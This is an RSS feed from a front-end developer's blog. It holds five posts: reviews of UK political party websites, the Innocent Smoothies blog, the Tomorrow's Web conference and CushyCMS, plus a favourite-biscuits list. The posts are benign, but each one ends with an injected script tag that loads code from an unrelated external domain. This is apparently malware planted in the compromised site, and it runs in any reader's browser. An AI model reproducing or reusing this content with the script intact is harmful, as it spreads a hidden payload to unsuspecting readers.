<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Maban &#187; Reviews</title>
	<atom:link href="http://maban.co.uk/category/review/feed" rel="self" type="application/rss+xml" />
	<link>http://maban.co.uk</link>
	<description>Anna Debenham - Front End Developer</description>
	<lastBuildDate>Tue, 20 Jul 2010 20:58:44 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Comparison of the UK&#8217;s political party websites</title>
		<link></link>
		<comments>http://maban.co.uk/442#comments</comments>
		<pubDate>Sun, 28 Mar 2010 20:35:48 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Design]]></category>
		<category><![CDATA[Reviews]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=442</guid>
		<description><![CDATA[Government and political party websites are some of the worst designed out there, which is a shame because they often have a lot of important information to communicate. Last year we saw how a strong online presence so positively benefited Obama&#8217;s campaign and won the inspiration of many young people, an audience the media claims [...]]]></description>
			<content:encoded><![CDATA[<p>Government and political party websites are some of the worst designed out there, which is a shame because they often have a lot of important information to communicate. Last year we saw how a strong online presence so positively benefited Obama&#8217;s campaign and won the inspiration of many young people, an audience the media claims to be disillusioned with politics. I wanted to see how each of the main UK party websites compared, so I&#8217;ve done a comparison of the design and code of 4 of them (plus an extra minor party for the lols).</p>
<p><span id="more-442"></span></p>
<p>Please note I dislike each party equally, so no bias intended.</p>
<p>You can click on the images to see them full size.</p>
<h2>Labour</h2>
<p>I had some great criticisms lined up for Labour&#8217;s website, but they redesigned it halfway through writing this post. It&#8217;s a vast improvement on the previous one, although the code is a disappointment.</p>
<h3>Design:</h3>
<p>I think the new design is ok (compared to the others). It&#8217;s consistent, clear and easy to read. Although the drop-down navigation doesn&#8217;t work when JavaScript is disabled, the pages still link to the subpages so it degrades nicely.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour.jpg"></a><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour3.jpg"><img class="aligncenter size-large wp-image-489" title="party-website-labour" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour3-1024x626.jpg" alt="Labour website screenshot" width="645" height="394" /></a></p>
<p style="text-align: left;">Most of the website responds well when the text size is increased, but there are a lot of elements with fixed heights, making it difficult or impossible to read. The links below from the policies section could have so easily be made to expand when the text gets bigger.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour-buttons.gif"><img class="aligncenter size-full wp-image-491" title="party-website-labour-buttons" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-labour-buttons.gif" alt="Labour party policy buttons" width="237" height="270" /></a></p>
<h3>Code</h3>
<p>The structure of the code is good, but the choice of id and class names very poor. Some of the <code>div</code> ids are prefixed by the word &#8220;div&#8221;. It&#8217;s completely unnecessary.  There are also lots of instances of <code>div_a</code>, <code>div_b</code>, <code>li id="a"</code>, <code>li id="b"</code>, <code>id="small-column-left"</code>, so not very semantic code. There are far too many ids. On any site, especially this size or being maintained by other people, it is far better to use classes over ids. Ids are for addressable content and cannot be reused more than once on the same page. Classes are much more flexible and achieve the same result.</p>
<h3>Overall impression</h3>
<p>I spent half an hour on their site, and I still don&#8217;t know what they stand for. Protecting front line services? Who doesn&#8217;t have this as a policy… Also, <a href="http://www.labour.org.uk/policies/crime-justice-and-immigration">longcat waffle like this isn&#8217;t helpful</a>, I want bulletpoints. Although they have a lot written about general areas such as the economy and healthcare, I still don&#8217;t really know where they stand on each policy. Every party is pro education, pro healthcare and pro jobs, but it&#8217;s the little things that I want to know about. In their policies section they have a search box where you can search their policies. I think this is a really nice idea, but I want to know where Labour stand on things like abortion and euthanasia, both things I couldn&#8217;t find when I searched on their site.</p>
<h2>Conservatives</h2>
<h3>Design</h3>
<p>The design isn&#8217;t bad, it doesn&#8217;t look as outdated as most. However, this is just the homepage. The inner pages look very different. (How appropriate). The secondary navigation, and even some of the design is inconsistent throughout the site, making the website that much more difficult to use.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-conservatives.jpg"><img class="aligncenter size-large  wp-image-474" title="party-website-conservatives" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-conservatives-1024x626.jpg" alt="Conservative party website screenshot" width="645" height="394" /></a></p>
<h3>Code</h3>
<p>Classes are reused nicely, and the navigation has access keys. Severe case of divitus though and a lot of JavaScript.</p>
<h3>Overall impression</h3>
<p>I&#8217;m disappointed by what initially looked to be a semi-decent website. My main frustration was that so many of their policies and manifestos were downloadable PDFs or fancy page-flip Flash rather than HTML pages. It&#8217;s just lazy.</p>
<h2>Liberal Democrats</h2>
<h3>Design</h3>
<p>When I first visited this site, I thought this was it. Oh right, it&#8217;s a splash page. Hello 1998.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem.jpg"><img class="aligncenter size-large  wp-image-475" title="party-website-libdem" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem-1024x626.jpg" alt="Liberal Democrat party splashpage screenshot" width="645" height="394" /></a></p>
<p>You&#8217;ve got to have a little sympathy for the Lib dems for having the ugliest colour scheme &#8211; cyan and yellow. It&#8217;s very boxy and boring, and the photos are uninspiring. Mostly old men in suits wistfully pointing at things.</p>
<p>The big blue images with yellow text are repeated across the site, and often have really unhelpful alt text like <code>alt=""</code>. There&#8217;s a lot of visual clutter and cliché stock images.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem2.jpg"><img class="aligncenter size-large  wp-image-476" title="party-website-libdem2" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-libdem2-1024x626.jpg" alt="Liberal Democrat party website screenshot" width="645" height="394" /></a></p>
<h3>Code</h3>
<p>Every <code>div</code> has an id prefixed by the word &#8220;div&#8221;. And if that isn&#8217;t enough, nested within <code>#divTop</code>, we&#8217;ve got <code>#divTopLeft</code>, <code>#divTopCentre</code> and <code>#divTopRight</code>. And within <code>#divTopCentre</code> we&#8217;ve got <code>#divTopCentreTop</code> and <code>#divTopCentreBottom</code>. Blimey.</p>
<h3>Overall impression</h3>
<p>A really average site. The &#8220;what we stand for&#8221; navigation menu is useful, but there really is too much to look at on one page.</p>
<h2>Green</h2>
<h3>Design</h3>
<p>I&#8217;m personally not keen on the Green party&#8217;s website design. To me it feels like a hippy local newspaper site. It&#8217;s very blocky, things don&#8217;t align, and the link styles are too close to the normal text style.</p>
<p><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-green.jpg"><img class="aligncenter size-large wp-image-477" title="party-website-green" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-green-1024x626.jpg" alt="Green party website screenshot" width="645" height="394" /></a></p>
<h3>Code</h3>
<p>The code is along the same lines as the Lib dem website. Lots of unsemantic ids and classes like &#8220;left&#8221; and &#8220;right&#8221;. I don&#8217;t understand why they&#8217;ve bothered putting a &#8220;Validate XHTML&#8221; link on the site since it doesn&#8217;t actually validate.</p>
<h3>Overall impression</h3>
<p>I expected a little more from the Green party as they seem to be quite ahead with technology and are very popular with students. Saying that, their candidate MP <a href="http://www.carolinelucas.com">Caroline Lucas&#8217;s site</a> is really quite nice. I just wish they used that same style on the main site.</p>
<h2>British National Party</h2>
<p>I was going to avoid the BNP since I don&#8217;t consider them to be a proper political party, but their website is so ridiculous I thought I&#8217;d put them in here to win the wooden spoon award. If you haven&#8217;t heard of them, their policies are far-right, anti-immigration, anti foreign aid and pro capital punishment. Some public sector workforces such as the police ban membership from the party.</p>
<h3>Design</h3>
<p>It seems ironic that the BNP&#8217;s website is so similar *coughplagiarisedcough* to the Obama website.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp.jpg"><img class="aligncenter size-full wp-image-444" title="party-website-bnp" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp.jpg" alt="" width="634" height="388" /></a></p>
<p>The image on the left is the BNP website. The image on the right is Obama&#8217;s website. Hmmm…</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-obama.jpg"><img class="aligncenter size-full wp-image-450" title="party-website-bnp-obama" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-obama.jpg" alt="British National Party website screenshot" width="703" height="215" /></a></p>
<p>Have a closer look at the buttons. Drop shadows, reflections, bevels, stripes, gradients. Yep, these buttons have it all.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-buttons.jpg"> <img class="aligncenter size-full wp-image-462" title="party-website-bnp-buttons" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-buttons.jpg" alt="British National Party website buttons" width="214" height="230" /></a></p>
<p>I found this on their immigration policy website. Note the guy at the front with the <acronym title="Rocket Propelled Grenade">RPG</acronym>. Just a wild guess that this is photoshopped.</p>
<p style="text-align: center;"><a href="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-banner.jpg"><img class="aligncenter size-medium wp-image-463" title="party-website-bnp-banner" src="http://maban.co.uk/wp-content/uploads/2010/03/party-website-bnp-banner-300x127.jpg" alt="British National Party website banner" width="300" height="127" /></a></p>
<h3>Code</h3>
<p>The site is a hybrid of divs, more divs, break tags and tables. The only heading level is an <code>h2</code>.</p>
<h3>Overall impression</h3>
<p>The design is completely ripped off and has a bad case of photoshop vomit. The code is average and needs more heading levels to be semantic. The navigation wraps onto 2 lines, and the site generally looks like it was designed in Microsoft Publisher.</p>
<h2>Summary</h2>
<p>Too many of the party sites only had a vague list of their policies. A shopping list style of policies with links to more information on each one would be very useful. And it&#8217;s not just education and healthcare that people care about. They want to know the things like whether their party is pro euthanasia, pro abortion or pro same sex marriage, but too many parties shy away from doing this in case it turns voters off. Vague lists are meaningless and only serve to confuse potential voters.</p>
<p>Considering the success of Obama&#8217;s political campaign which had such a strong online emphasis, I expected the UK politcal parties to respond by improving their online experiences, but they&#8217;re disappointingly behind. They may not have as big budgets, but it&#8217;s a very effective form of marketing when it&#8217;s done right.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/442/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Innocent Smoothies</title>
		<link></link>
		<comments>http://maban.co.uk/298#comments</comments>
		<pubDate>Wed, 07 Oct 2009 12:24:10 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Reviews]]></category>
		<category><![CDATA[blogging]]></category>
		<category><![CDATA[innocent smoothies]]></category>
		<category><![CDATA[mailing lists]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=298</guid>
		<description><![CDATA[A lot of the clients I work with who have just set up a web presence for their company think it's a good idea to start a mailing list and a blog.  Everyone else is doing it, so why shouldn't they?  The problem is, so few companies get it right and very few people will bother to read them.
If you're like me, there are very few corporate mailing lists you willingly subscribe to.  They're just so boring and salesy.
The Innocent Smoothie website is one of the few companies that I think get their corporate blog spot on.  Even though I rarely buy their drinks (too expensive for me), I still enjoy reading it.]]></description>
			<content:encoded><![CDATA[<p>A lot of the clients I work with who have just set up a web presence for their company think it&#8217;s a good idea to start a mailing list and a blog.  Everyone else is doing it, so why shouldn&#8217;t they?  The problem is, so few companies get it right and very few people will bother to read them.<br />
<img class="alignleft size-medium wp-image-303" title="Innocent Smoothie News Header" src="http://maban.co.uk/wp-content/uploads/2009/10/Untitled-61-300x125.jpg" alt="Innocent Smoothie News Header" width="300" height="125" />If you&#8217;re like me, there are very few corporate mailing lists you willingly subscribe to.  They&#8217;re just so boring and salesy.<br />
The Innocent Smoothie website is one of the few companies that I think get their corporate blog spot on.  Even though I rarely buy their drinks (too expensive for me), I still enjoy reading it.</p>
<p><span id="more-298"></span></p>
<h3>They&#8217;re real people</h3>
<p>The blog talks about real people who work in the company, <a href="http://innocentdrinks.typepad.com/innocent_drinks/2009/08/money-money-money.html">like Alison, Ben, Ryan, James and Denym from Finance</a>.  You can tell that the people who work there have a really fun time.  By putting up photos and quotes from each of the team, it gives the company a human touch and makes it seem more friendly and approachable.  They even put up photos of company events, like their <a href="http://innocentdrinks.typepad.com/innocent_drinks/2009/08/sports-day-innocent-style.html">sports day</a>.</p>
<blockquote><p>And the shortest shorts competition was fearsome. And frightening. Fearsomely frightening.</p></blockquote>
<h3>Fun copy</h3>
<p>Their copy is colloquial, light-hearted and self-deprecating at times.  Here&#8217;s an excerpt from their knitted hat of the week&#8221; award.</p>
<blockquote><p>Without further ado. The winner is&#8230;&#8230;weirdly long pause&#8230;fumble with envelope&#8230;Big Bee Hive by Kerri from Essex.</p></blockquote>
<h3>They don&#8217;t just talk about carrots</h3>
<p>The blog has stories on the sorts of things that people working in an office might talk about.  Like <a href="http://innocentdrinks.typepad.com/innocent_drinks/2009/08/the-crust-of-the-matter.html">what do you call the crust at the end of a loaf of bread</a>?  At the end of the article, they add &#8220;Tell us what you call the thick-bit-of-bread-at-the-end-of-the-loaf and the best name will win a breadbin full of smoothies and some toast (lightly buttered).&#8221;  This encourages people to add comments, which is always good on a company blog.<br />
At the end of their mailing list, they have some fun, unrelated links that people have sent in, like Youtube videos.</p>
<h3>They are generous</h3>
<p>As well as offering money-off vouchers to people who subscribe to their mailing list, Innocent also reward customers who write to them with suggestions.</p>
<blockquote><p>Back in April when we launched our first ever banana free recipe &#8211; kiwis, apples and limes &#8211; we got in touch with everyone who&#8217;d ever written, emailed or called to ask us to make a smoothie without bananas and sent them a free voucher to have a bottle on us.</p></blockquote>
<h3>Useful information</h3>
<p>Dr Shilpee is a regular writer on the Innocent blog, and she answers questions people send in about health matters and adds recipes.  A bit like an agony aunt in a magazine.  She adds credibility to the blog, as well as giving useful titbits of information.</p>
<h3>Lots of photos</h3>
<p>The photos the staff upload to the blog are rarely cheesy stock ones.  They take pictures of their staff, customers and even <a href="http://innocentdrinks.typepad.com/innocent_drinks/2007/05/new_labels.html">sketches of new concepts and artwork.</a></p>
<p>However, it&#8217;s worth bearing in mind this sort of fun approach <a href="http://innocentdrinks.typepad.com/innocent_drinks/2007/05/new_labels.html?cid=69780450#comment-6a00d83451ba8c69e200d8352c487e53ef">doesn&#8217;t appeal to everyone</a>.</p>
<blockquote><p>I have never read such awful label copy in my life. What are you on at Innocent. Do you really think this is funny and appeals to &#8216;normal people&#8217;. You have gone one step too far!!</p></blockquote>
<p>Are there any blogs or mailing lists you subscribe to that you think get it right?<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/298/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Tomorrow&#8217;s Web</title>
		<link></link>
		<comments>http://maban.co.uk/229#comments</comments>
		<pubDate>Sat, 08 Aug 2009 22:46:22 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Conferences]]></category>
		<category><![CDATA[Reviews]]></category>
		<category><![CDATA[tomorrow's web]]></category>
		<category><![CDATA[youth]]></category>

		<guid isPermaLink="false">http://maban.co.uk/?p=229</guid>
		<description><![CDATA[Today I gave a talk at a web conference called Tomorrow&#8217;s Web, which was organised by Rob Day, 16, and Grant Bell, 17.  My talk was about how to be a good freelancer, and I&#8217;ll be uploading my slides, notes, links, and hopefully some video in my next post, but here&#8217;s a summary of [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.flickr.com/photos/anna_debenham/3803801576/"><img class="size-thumbnail alignleft" title="Tomorrows Web Logo" src="http://farm3.static.flickr.com/2673/3803801576_e5cf3a9daa.jpg" alt="" width="150" height="100" /></a>Today I gave a talk at a web conference called Tomorrow&#8217;s Web, which was organised by <a href="https://twitter.com/robday">Rob Day</a>, 16, and <a href="https://twitter.com/GrantBell">Grant Bell</a>, 17.  My talk was about how to be a good freelancer, and I&#8217;ll be uploading my slides, notes, links, and hopefully some video in my next post, but here&#8217;s a summary of some of the speakers.</p>
<p><span id="more-229"></span></p>
<p><a href="http://www.flickr.com/photos/anna_debenham/3803805098/"><img class="alignright" title="An Animated Nick Pellant" src="http://farm3.static.flickr.com/2614/3803805098_55a646b230.jpg" alt="" width="100" height="150" /></a><a href="https://twitter.com/npellant">Nick Pellant</a> did a stella talk about Building Your Company.  I was worried it would overlap on the things mentioned in mine, but it didn&#8217;t at all.  He seemed to cover everything that I didn&#8217;t have time to mention, and I was quite jealous of the way he presented while walking across the stage, without notes, whereas I stayed pretty much glued to the spot.  He also had very few slides, meaning the attention was focused purely on what he was saying.  His presentation style seemed to echo that of <a href="http://twitter.com/ryancarson">Ryan Carson</a> (watch out Ryan) which is perhaps expected since Nick works in the same offices as Carsonified.  He even gave out lovely free posters at the end which cover all the points he mentioned.  These are handouts you don&#8217;t want to throw away.  All in all, a great speaker and also very talented at his work.</p>
<p><a href="http://www.flickr.com/photos/anna_debenham/3803810272/"><img class="alignleft" title="Jamie Rumbelow" src="http://farm4.static.flickr.com/3420/3803877706_a8b41b7c96.jpg" alt="" width="100" height="150" /></a><a href="https://twitter.com/jamierumbelow">Jamie Rumbelow</a> did a talk about APIs which I was really impressed with.  He&#8217;s 14 and seemed completely relaxed with talking about something quite complex to a room full of people.  He is also very enthusiastic, and was asking me how he could help with <a href="http://scrunchup.com">Scrunchup</a>.  A very sound guy, and one to keep an eye on.</p>
<p><img class="alignright" title="James Proud" src="http://farm3.static.flickr.com/2617/3803029867_5f0cb87fd6.jpg" alt="" width="150" height="100" />If you could buy stocks in teenagers, I would buy as many as I could in <a href="https://twitter.com/JamesProud">James Proud</a>.  This is an 18 year old guy who has his head well and truly screwed on.  He gave a pitch about his project, <a href="http://www.giglocator.com/">Gig Locator</a>, and blew away the audience and the panel.  This guy knows exactly what he&#8217;s talking about.  He knows his product really well, has good ties in his product&#8217;s industry, and keeps his two feet on the ground at all times.  He&#8217;s business savvy and an engaging speaker, as well as having a really decent product.  This guy is gold dust.  Conference organisers take note.</p>
<p><a href="http://www.flickr.com/photos/anna_debenham/3803839290/"><img class="alignleft" title="Greg Cooper" src="http://farm3.static.flickr.com/2620/3803839290_e3bbf4ba82.jpg" alt="" width="100" height="150" /></a>Then there was <a href="https://twitter.com/Awfy">Greg Cooper</a>.  Greg has made the decision to work purely in <abbr title="User Interface">UI</abbr> design for social networks, which is pretty smart in my opinion.  As his specialism is quite niche, it will be really interesting to see what Greg is working on in the next few years.  I&#8217;m sure he&#8217;ll be in hot demand by a lot of companies.<br />
His presentation was really good, he touched on things like the importance of designing for the extremes &#8211; specifically designing how it would look if someone had a really long name which is something so many designers don&#8217;t think about.<br />
Sadly, most people had left the conference before Greg started his talk, so not many people got to hear it.  I guess this is the cost of making a conference free.</p>
<p><a href="http://www.flickr.com/photos/anna_debenham/3803020051/"><img class="alignright" title="Charlie McDonnell (charlieissocoollike)" src="http://farm4.static.flickr.com/3568/3803020051_faaebe73ca.jpg" alt="" width="150" height="100" /></a>I enjoyed <a href="https://twitter.com/coollike">Charlie McDonnell</a>&#8217;s talk a lot.  It wasn&#8217;t about Web Design or Development, but about the life of a teenage YouTuber, which brought me back to my Media Studies days.  If you haven&#8217;t heard of charlieissocoollike, <a href="http://youtube.com/charlie">check out his videos</a>, specifically <a href="http://www.youtube.com/watch?v=BpWqCzru5zk">this one which is about tea</a>.  One of the interesting things he mentioned was that some of the things he is doing with agencies like the BBC is breaking ground in New Media, and him and these big organisations are on the same level, both trying different things and not quite sure what will happen.</p>
<p><a href="http://www.flickr.com/photos/anna_debenham/3803827108/"><img class="alignleft" title="The Judging Panel" src="http://farm4.static.flickr.com/3421/3803827108_a2af3aee68.jpg" alt="" width="150" height="100" /></a>I really enjoyed my time at the conference.  It was great to catch up with <a href="http://twitter.com/binarytales">Jon</a> who came all the way from up North, and it was nice to be in a room full of like minded people of a similar age to me.  As with any conference in its first year, it has room for improvement, but I think it was a massive achievement that Rob and Grant managed to do it at all, and for free.  The feedback from other attendees has been very positive, coming away with new contacts and ideas.  And if inspiring a bunch of young people was their goal, they certainly achieved it, and I guess that&#8217;s all that really matters.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/229/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Review of CushyCMS</title>
		<link></link>
		<comments>http://maban.co.uk/32#comments</comments>
		<pubDate>Tue, 08 Jul 2008 23:34:29 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Reviews]]></category>
		<category><![CDATA[cms]]></category>
		<category><![CDATA[micro-cms]]></category>

		<guid isPermaLink="false">http://maban.co.uk/index.php/2008/07/08/review-of-cushycms/</guid>
		<description><![CDATA[A few days ago, I came upon the CushyCMS website www.cushycms.com
I&#8217;ve tried using Wordpress, Drupal, Joomla! and Mambo, and I&#8217;m not going to pretend this is better than them all.  It&#8217;s not, it just meets a different need.  Whereas CMSs such as Wordpress are great if you want to make a site with a blog, [...]]]></description>
			<content:encoded><![CDATA[<p>A few days ago, I came upon the CushyCMS website <a href="http://www.cushycms.com/" target="_blank">www.cushycms.com</a></p>
<p>I&#8217;ve tried using Wordpress, Drupal, Joomla! and Mambo, and I&#8217;m not going to pretend this is better than them all.  It&#8217;s not, it just meets a different need.  Whereas CMSs such as Wordpress are great if you want to make a site with a blog, have the ability to add pages, plugins, and change themes, sometimes sites don&#8217;t need all that functionality.  Maybe on a 5 page site, you just want to be able to let the client change a few words every now and then, so a full-blown CMS can be a little overwhelming.</p>
<h3><span id="more-32"></span> Here&#8217;s how CushyCMS works:</h3>
<p>in your HTML file, you define the bits you want to be editable by adding class=&#8221;cushycms&#8221;</p>
<p>so a heading could be tagged as<br />
&lt;h1 class=&#8221;cushycms&#8221; title=&#8221;Heading&#8221;&gt;&lt;/h1&gt;</p>
<p>and the editable content<br />
&lt;div class=&#8221;cushycms&#8221; title=&#8221;Main Content&#8221;&gt;&lt;/div&gt;</p>
<h3>Trying it out</h3>
<p>I thought I&#8217;d give it a go with a small project I was working on.  It says it is standards compliant, and I had a look at the company that created it to reassure myself.  It&#8217;s built by Stateless Systems based in Australia <a href="http://www.statelesssystems.com/" target="_blank">www.statelesssystems.com</a> and their other projects look quite interesting too: an alternative PDF viewer, a login sharing system to allow people to bypass web registration, and a coupon sharing site.</p>
<p>I created an account, typed in my FTP details, and browsed for the pages I&#8217;d given classes.  It seemed a little sluggish, but that may have been a slow connection at my end.  I would have liked to have been able to assign more than one page at a time, as selecting the file, waiting for it to load, and doing the process again seemed a little monotonous.</p>
<h3>Editing Content</h3>
<p>The pages I&#8217;d assigned displayed in a list with a little edit icon.  Clicking on this takes me to a form.  There is a field for each of the classes I&#8217;d assigned, and the interface looks quite similar to if I were sending an email, which is nice for less technically experienced clients.  I guess it could be compared to Contribute which is what I would have considered using instead.</p>
<p>At the moment, I&#8217;m labeled as &#8216;Designer&#8217; in the menu, which I guess is Administrator.  I can assign editors to the site, and they get a stripped down version of what I can see.  As an editor I can&#8217;t add pages, but if I wanted to do that, I would be looking for a more functional CMS.</p>
<h3>Assigning Editors</h3>
<p>One thing that I wanted to do but couldn&#8217;t was to create more than one Administrator.  The administrator can assign many websites and editors to their account, but there can only be one administrator to each account.  I also can&#8217;t make multiple accounts with the same email address, which I suppose is to encourage people to upgrade to a Pro account (which costs $28 a month &#8211; around £15).  This lets you brand the CMS and have unlimited sites and editors.</p>
<h3>The Prognosis</h3>
<p>To sum up, I think CushyCMS is a great solution for small sites that don&#8217;t need content changed that often, as it gives the client more control.  Also, some CMSs make me feel quite restricted in how I design the site.  At the moment, I feel like I have to design sites around the CMS, but I prefer to design a site, and have the CMS integrate into it.  Maybe being able to do this comes with experience!</p>
<p>I&#8217;m tempted to take the plunge to Pro when I have enough of these types of projects to make it worthwhile.  I&#8217;d really appreciate your opinions on whether you think this is a good solution, or if it will turn my code into scrambled egg.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/32/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Biscuits!!!</title>
		<link></link>
		<comments>http://maban.co.uk/17#comments</comments>
		<pubDate>Sat, 15 Mar 2008 22:42:34 +0000</pubDate>
		<dc:creator>Anna Debenham</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Reviews]]></category>
		<category><![CDATA[food]]></category>

		<guid isPermaLink="false">http://maban.co.uk/index.php/2008/03/15/biscuits/</guid>
		<description><![CDATA[Today I&#8217;m going to talk about something vitally important and close to my heart&#8230; biscuits!  The following is a constructive analysis of my 5 favourite biscuits, weighing out their pros and cons.
Isn&#8217;t it obvious that I&#8217;m putting off doing something more important?

Number 5 &#8211; Custard Creams
These are plain biscuits with a layer of cream [...]]]></description>
			<content:encoded><![CDATA[<p>Today I&#8217;m going to talk about something vitally important and close to my heart&#8230; biscuits!  The following is a constructive analysis of my 5 favourite biscuits, weighing out their pros and cons.</p>
<p>Isn&#8217;t it obvious that I&#8217;m putting off doing something more important?</p>
<p><span id="more-17"></span></p>
<h3>Number 5 &#8211; Custard Creams</h3>
<p>These are plain biscuits with a layer of cream in the middle which isn&#8217;t too sickly sweet.  I like the pretty pattern they have on the outside too.  They are perfect when dunked in tea because they don&#8217;t immediately go soggy.</p>
<h3>Number 4 &#8211; Bourbons</h3>
<p>Similar construction to custard creams, but with chocolate biscuit and filling.  These are also lovely dunked in tea.  They do go a bit mank if left open though!</p>
<h3>Number 3 &#8211; Oreos</h3>
<p>I used to find it almost impossible to get these anywhere in the UK, now they seem to sell them all over the place.  These are dark chocolate biscuits with a custard-cream-like filling.  In the US, they make loads of different flavoured ones, and even ones with double the filling!  They&#8217;re quite expensive though, so nice as a treat!</p>
<h3>Number 2 &#8211; The Pink Wafer Biscuit</h3>
<p>Incredibly addictive.   The biscuit consists of layers of pink wafer, sandwiched between layers of vanilla.  The problem is they are very very moreish and I often find myself feeling ill after demolishing an entire packet because they&#8217;re so sweet..  Dipping them in tea can result in a lot of soggy pink stuff at the bottom of the mug.</p>
<h3>Number 1 &#8211; Chocolate Caramel Digestives</h3>
<p>These are immense!  They take the chocolate digestive template, but have an inner layer of caramel, which really complements the chocolate and the biscuit components.</p>
<p>&#8230;that was way too many big words!</p>
<p>Every friend I have introduced these to has become completely obsessed with them.  Sometimes we&#8217;ll have conversations like this:</p>
<p>&#8220;do you want to come round for a cup of tea?&#8221;</p>
<p>&#8220;..mmm&#8230; naahh, I&#8217;ve got some really important..&#8221;</p>
<p>&#8220;I&#8217;ve got caramel digestives&#8230;&#8221;</p>
<p>&#8220;OOHH! OK!&#8221;</p>
<p>Because of the properties of the caramel, the biscuit does not tend to crumble as much as others, but the chocolate is very melty and sticky (especially when dunked). Mmmmmmmmm&#8230;&#8230;</p>
<p>So, what are your favourite biscuits?<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://maban.co.uk/17/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
